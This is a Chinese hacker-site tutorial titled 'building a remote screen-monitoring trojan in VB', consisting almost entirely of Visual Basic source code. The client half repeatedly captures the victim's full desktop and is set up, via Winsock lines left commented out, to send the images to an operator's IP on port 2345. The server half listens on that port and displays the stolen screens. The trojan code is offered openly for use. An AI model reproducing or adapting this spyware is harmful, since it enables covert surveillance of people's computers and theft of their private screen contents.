| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 |

您现在的位置： 中国X黑客小组 >> 技术文章 >> 编程技术 >> 黑客编程 >> 文章正文 用户登录 新用户注册

用VB打造远程屏幕监控木马    热      【字体：小 大】
用VB打造远程屏幕监控木马
作者：未知    文章来源：CnXHacker.Net    点击数：    更新时间：2006-10-26
定时截取屏幕图形,作为被控端 Option Explicit Private Type BITMAP     bmType As Long     bmWidth As Long     bmHeight As Long     bmWidthBytes As Long     bmPlanes As Integer     bmBitsPixel As Integer     bmBits As Long End Type Private Declare Function GetObj Lib "gdi32" Alias "GetObjectA" (ByVal hObject As Long, ByVal nCount As Long, lpObject As Any) As Long Private Declare Function GetDesktopWindow Lib "user32" () As Long Private Declare Function GetDC Lib "user32" (ByVal hwnd As Long) As Long Private Declare Function ReleaseDC Lib "user32" (ByVal hwnd As Long, ByVal hdc As Long) As Long Private Declare Function BitBlt Lib "gdi32" (ByVal hDestDC As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal dwRop As Long) As Long Private Declare Sub CopyMemory Lib "Kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) Private Declare Function GetBitmapBits Lib "gdi32" (ByVal hBitmap As Long, ByVal dwCount As Long, lpBits As Any) As Long Private Declare Function SetBitmapBits Lib "gdi32" (ByVal hBitmap As Long, ByVal dwCount As Long, lpBits As Any) As Long Private Declare Function CreateCompatibleBitmap Lib "gdi32" (ByVal hdc As Long, ByVal nWidth As Long, ByVal nHeight As Long) As Long Private Declare Function CreateCompatibleDC Lib "gdi32" (ByVal hdc As Long) As Long Private Declare Function SelectObject Lib "gdi32" (ByVal hdc As Long, ByVal hObject As Long) As Long Private Declare Function DeleteDC Lib "gdi32" (ByVal hdc As Long) As Long Private Declare Function DeleteObject Lib "gdi32" (ByVal hObject As Long) As Long Private MyHdc1 As Long, MyBmp1 As Long, MyOldBmp1 As Long, ScrW As Long, ScrH As Long Private StartT As Single Private Sub Form_Load()   Dim bm As BITMAP, BmpSize As Long   Timer1.Enabled = False   '间隔时间获取图形   Me.ScaleMode = 3   ScrW = Screen.Width \ Screen.TwipsPerPixelX   ScrH = Screen.Height \ Screen.TwipsPerPixelY   '这只是方便调试的示例，实用程序中，不用临时DC，可直接取窗体的BMP，会快一些   MyHdc1 = CreateCompatibleDC(FrmClient.hdc)   MyBmp1 = CreateCompatibleBitmap(FrmClient.hdc, ScrW, ScrH)   MyOldBmp1 = SelectObject(MyHdc1, MyBmp1)   'Ws2为WinSock控件，用于发送数据     'Ws2.RemoteHost = InputBox("请输入远程服务器ip地址", "远程监控测试", "127.0.0.1")   'Ws2.RemotePort = 2345   'Ws2.Connect   Timer1.Interval = 10000   Timer1.Enabled = True End Sub Private Sub Form_Unload(Cancel As Integer)   'Ws2.Close   SelectObject MyHdc1, MyOldBmp1   DeleteObject MyBmp1   DeleteDC MyHdc1 End Sub Private Sub Timer1_Timer()   Dim i As Long, d As Long, b As Long, bm As BITMAP, dat() As Byte, BmpSize As Long   StartT = Timer   d = GetDesktopWindow   i = GetDC(d)   BitBlt MyHdc1, 0, 0, ScrW, ScrH, i, 0, 0, vbSrcCopy   ReleaseDC d, i   GetObj MyBmp1, Len(bm), bm   BmpSize = bm.bmWidthBytes * bm.bmHeight   ReDim dat(BmpSize - 1)   GetBitmapBits MyBmp1, BmpSize, dat(0)   ReDim Preserve dat(BmpSize + 1)   dat(BmpSize) = 13   dat(BmpSize + 1) = 10   'StartT = Timer   'Ws2.SendData dat   Debug.Print dat     'dat为获取到的屏幕图形数据 End Sub Private Sub Ws2_Close()   StatusBar1.SimpleText = Ws2.RemoteHost & " Disconnected.."   Ws2.Close End Sub Private Sub Ws2_Connect()   StatusBar1.SimpleText = Ws2.RemoteHost & " Connected.." End Sub Private Sub Ws2_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)   On Error Resume Next   StatusBar1.SimpleText = Ws2.RemoteHost & " Error : " & Description   Ws2.Close End Sub '============================================================= '项目名称:   Server (远程屏幕监控端) '窗口名称：   FrmServer 'WinSock控件：Ws1 'StatusBar控件:StatusBar1 (注意：StatusBar1.Style = sbrSimple) '============================================================= Option Explicit Private Type BITMAP     bmType As Long     bmWidth As Long     bmHeight As Long     bmWidthBytes As Long     bmPlanes As Integer     bmBitsPixel As Integer     bmBits As Long End Type Private Declare Function GetObj Lib "gdi32" Alias "GetObjectA" (ByVal hObject As Long, ByVal nCount As Long, lpObject As Any) As Long Private Declare Function GetDesktopWindow Lib "user32" () As Long Private Declare Function GetDC Lib "user32" (ByVal hwnd As Long) As Long Private Declare Function ReleaseDC Lib "user32" (ByVal hwnd As Long, ByVal hdc As Long) As Long Private Declare Function BitBlt Lib "gdi32" (ByVal hDestDC As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal dwRop As Long) As Long Private Declare Sub CopyMemory Lib "Kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) Private Declare Function GetBitmapBits Lib "gdi32" (ByVal hBitmap As Long, ByVal dwCount As Long, lpBits As Any) As Long Private Declare Function SetBitmapBits Lib "gdi32" (ByVal hBitmap As Long, ByVal dwCount As Long, lpBits As Any) As Long Private Declare Function CreateCompatibleBitmap Lib "gdi32" (ByVal hdc As Long, ByVal nWidth As Long, ByVal nHeight As Long) As Long Private Declare Function CreateCompatibleDC Lib "gdi32" (ByVal hdc As Long) As Long Private Declare Function SelectObject Lib "gdi32" (ByVal hdc As Long, ByVal hObject As Long) As Long Private Declare Function DeleteDC Lib "gdi32" (ByVal hdc As Long) As Long Private Declare Function DeleteObject Lib "gdi32" (ByVal hObject As Long) As Long Private ScrW As Long, ScrH As Long Private MyHdc As Long, MyBmp As Long, MyOldBmp As Long, BmpDat() As Byte, RevByte As Long Private StartT As Single Private Sub Form_Load()   Dim bm As BITMAP, BmpSize As Long     On Error GoTo ErrLoad     Me.ScaleMode = 3   ScrW = Screen.Width \ Screen.TwipsPerPixelX   ScrH = Screen.Height \ Screen.TwipsPerPixelY   '这只是方便调试的示例，实用程序中，不用临时DC，可直接取窗体的BMP，会快一些   MyHdc = CreateCompatibleDC(FrmServer.hdc)   MyBmp = CreateCompatibleBitmap(FrmServer.hdc, ScrW, ScrH)   MyOldBmp = SelectObject(MyHdc, MyBmp)       GetObj MyBmp, Len(bm), bm   BmpSize = bm.bmWidthBytes * bm.bmHeight   ReDim BmpDat(BmpSize - 1)   GetBitmapBits MyBmp, BmpSize, BmpDat(0)   WS1.LocalPort = 2345   WS1.Listen     Exit Sub   ErrLoad:   MsgBox Error End Sub Sub getscreen() End Sub Private Sub Form_Unload(Cancel As Integer)   On Error Resume Next   WS1.Close   SelectObject MyHdc, MyOldBmp   DeleteObject MyBmp   DeleteDC MyHdc End Sub Private Sub WS1_Close()   StatusBar1.SimpleText = WS1.RemoteHostIP & " Disconnected.."   WS1.Close   If WS1.State = sckListening Then     WS1.Close   Else     WS1.LocalPort = 2345     WS1.Listen   End If End Sub Private Sub Ws1_ConnectionRequest(ByVal requestID As Long)   If WS1.State <> sckClosed Then WS1.Close   StatusBar1.SimpleText = WS1.RemoteHostIP & " Connecting.."   WS1.Accept requestID   If WS1.State = 7 Then StatusBar1.SimpleText = WS1.RemoteHostIP & " Connected.." End Sub Private Sub Ws1_DataArrival(ByVal bytesTotal As Long)   Dim dat() As Byte, i As Long, nTime As Long     On Error Resume Next     WS1.GetData dat, vbArray Or vbByte   i = InStrB(1, dat, ChrB(13) & ChrB(10))   If i > 0 Then     'StartT = Timer     If i > 1 Then CopyMemory BmpDat(RevByte), dat(0), i - 1     SetBitmapBits MyBmp, UBound(BmpDat) + 1, BmpDat(0)     RevByte = 0     '实用程序中，不用临时DC，下面一步可省     BitBlt Me.hdc, 0, 0, Me.ScaleWidth, Me.ScaleHeight, MyHdc, 0, 0, vbSrcCopy     nTime = Timer - Val(Me.Caption)     Me.Caption = Timer - StartT     If Len(StatusBar1.SimpleText) < 255 Then         StatusBar1.SimpleText = nTime & "，" & StatusBar1.SimpleText     Else         StatusBar1.SimpleText = nTime     End If     If bytesTotal > i + 1 Then         RevByte = bytesTotal - i - 1         CopyMemory BmpDat(0), dat(i + 1), RevByte     End If   Else     CopyMemory BmpDat(RevByte), dat(0), bytesTotal     RevByte = RevByte + bytesTotal   End If   End Sub Private Sub WS1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)   StatusBar1.SimpleText = ("Error : " & Description) End Sub
文章录入：IceRiver    责任编辑：IceRiver
	上一篇文章： 实时的监控一个目录 下一篇文章： 用VB编写一个加密软件
【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				“VB蠕虫变种MQ”病毒技术细 用VMware虚拟环境让恶意软件 VB.NET 拖动无边框窗体编程实 病毒清除技巧u.vbe和u.bat手 设陷阱用VMware虚拟环境让恶 学会用 VC++ 动态链接库编写 了解VB编写病毒的大体方法 学会用 VC++ 动态链接库编写 用vbs来写sql注入等80端口的 网上公布免费使用Vista 120天

网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM

© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.